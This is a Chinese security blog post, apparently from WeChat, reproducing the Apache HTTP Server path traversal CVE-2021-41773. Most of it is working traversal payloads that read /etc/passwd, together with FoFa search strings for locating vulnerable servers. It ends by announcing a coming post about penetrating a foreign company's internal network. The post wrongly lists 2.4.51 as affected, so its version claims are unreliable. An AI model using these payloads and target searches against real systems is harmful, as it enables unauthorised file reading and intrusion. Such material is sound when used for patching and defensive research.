前言:2021年国庆期间。Apache官方发布安全通告,披露了Apache HTTP Server存在路径穿越漏洞。漏洞编号CVE-2021-41773。Apache HTTP Server 2.4.49版本包括最新版Apache HTTP Server 2.4.51 对路径规范化所做的更改中存在一个路径穿越漏洞。攻击者可利用该漏洞读取到Web目录外的其他文件。如:系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。
高
漏洞风险点
攻击者可利用该漏洞获取敏感信息甚至远程代码执行
影响版本
Apache Http Server 2.4.49 <= 2.4.51
FoFa关键词
server="Apache/2.4.49"
server="Apache/2.4.50"
server="Apache/2.4.51"
漏洞利用前提条件:
1、Web容器 Apache版本为>= 2.4.49
2、服务器中设置所有目录允许被访问 例如 Apachep配置文件配置
<Directory />
Require all granted
</Directory>
0x02 漏洞payload
Apache 2.4.49
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Apache 2.4.50
/cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/etc/passwd
Apache 2.4.51
/cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/etc/passwd
Apache2.4.49
Apache2.4.50
end
下期预告
实战渗透境外某不友好国公司内网
欢迎投稿并加入我们,请联系公众号:Golden-Qianjiang
原文始发于微信公众号(金色钱江):【复现】Apache2.4.49-2.4.51任意文件读取
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论